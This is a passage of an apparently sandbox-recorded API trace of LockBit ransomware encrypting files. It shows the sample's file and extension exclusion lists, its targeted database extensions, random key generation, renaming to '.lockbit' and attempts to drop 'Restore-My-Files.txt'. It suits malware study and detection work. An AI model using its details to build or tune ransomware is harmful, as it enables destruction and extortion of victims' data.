returned -1 [0182.622] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0182.622] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0182.622] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF.lockbit") returned 70 [0182.622] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl1.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0182.628] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.628] malloc (_Size=0x40068) returned 0x1ff1e60 [0182.628] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2582) returned 1 [0182.628] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.629] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0182.629] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.629] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0182.629] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0182.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.631] malloc (_Size=0xa2) returned 0x1fa2ed8 [0182.631] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0182.632] free (_Block=0x1fa2ed8) [0182.632] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0182.632] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0182.632] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0182.633] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e5c1270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x0, dwReserved1=0x0, cFileName="WHIRL2.WMF", cAlternateFileName="")) returned 1 [0182.633] lstrcmpiW (lpString1=".", lpString2="WHIRL2.WMF") returned -1 [0182.633] lstrcmpiW (lpString1="..", lpString2="WHIRL2.WMF") returned -1 [0182.633] PathFindExtensionW (pszPath="WHIRL2.WMF") returned=".WMF" [0182.633] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0182.633] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0182.634] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0182.634] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WHIRL2.WMF") returned -1 [0182.634] lstrcmpiW (lpString1="ntldr", lpString2="WHIRL2.WMF") returned -1 [0182.634] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WHIRL2.WMF") returned -1 [0182.634] lstrcmpiW (lpString1="bootsect.bak", lpString2="WHIRL2.WMF") returned -1 [0182.635] lstrcmpiW (lpString1="autorun.inf", lpString2="WHIRL2.WMF") returned -1 [0182.635] lstrcmpiW (lpString1="thumbs.db", lpString2="WHIRL2.WMF") returned -1 [0182.635] lstrcmpiW (lpString1="iconcache.db", lpString2="WHIRL2.WMF") returned -1 [0182.635] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0182.635] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF") returned=".WMF" [0182.635] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.635] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0182.635] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0182.636] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0182.636] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF.lockbit") returned 70 [0182.636] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl2.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0182.637] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.637] malloc (_Size=0x40068) returned 0x3df0008 [0182.637] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2966) returned 1 [0182.637] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.638] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0182.638] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.638] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0182.638] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.642] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.642] malloc (_Size=0xa2) returned 0x1fa2ed8 [0182.642] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0182.643] free (_Block=0x1fa2ed8) [0182.644] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0182.644] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0182.644] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0182.644] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e5c1270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x0, dwReserved1=0x0, cFileName="WING1.WMF", cAlternateFileName="")) returned 1 [0182.644] lstrcmpiW (lpString1=".", lpString2="WING1.WMF") returned -1 [0182.644] lstrcmpiW (lpString1="..", lpString2="WING1.WMF") returned -1 [0182.644] PathFindExtensionW (pszPath="WING1.WMF") returned=".WMF" [0182.644] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0182.644] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0182.645] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0182.645] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WING1.WMF") returned -1 [0182.646] lstrcmpiW (lpString1="ntldr", lpString2="WING1.WMF") returned -1 [0182.646] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WING1.WMF") returned -1 [0182.646] lstrcmpiW (lpString1="bootsect.bak", lpString2="WING1.WMF") returned -1 [0182.646] lstrcmpiW (lpString1="autorun.inf", lpString2="WING1.WMF") returned -1 [0182.646] lstrcmpiW (lpString1="thumbs.db", lpString2="WING1.WMF") returned -1 [0182.646] lstrcmpiW (lpString1="iconcache.db", lpString2="WING1.WMF") returned -1 [0182.646] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0182.646] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF") returned=".WMF" [0182.646] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.646] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0182.646] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0182.647] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0182.647] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF.lockbit") returned 69 [0182.647] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wing1.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0182.649] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.649] malloc (_Size=0x40068) returned 0x1ff1e60 [0182.649] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2582) returned 1 [0182.649] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.649] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0182.650] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0182.650] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0182.655] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.655] malloc (_Size=0xa0) returned 0x2073f40 [0182.655] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0xa0, FileInformationClass=0xa) returned 0x0 [0182.656] free (_Block=0x2073f40) [0182.656] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0182.656] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0182.657] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0182.657] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x708e7550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x976, dwReserved0=0x0, dwReserved1=0x0, cFileName="WING2.WMF", cAlternateFileName="")) returned 1 [0182.657] lstrcmpiW (lpString1=".", lpString2="WING2.WMF") returned -1 [0182.657] lstrcmpiW (lpString1="..", lpString2="WING2.WMF") returned -1 [0182.657] PathFindExtensionW (pszPath="WING2.WMF") returned=".WMF" [0182.657] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0182.657] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0182.658] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW 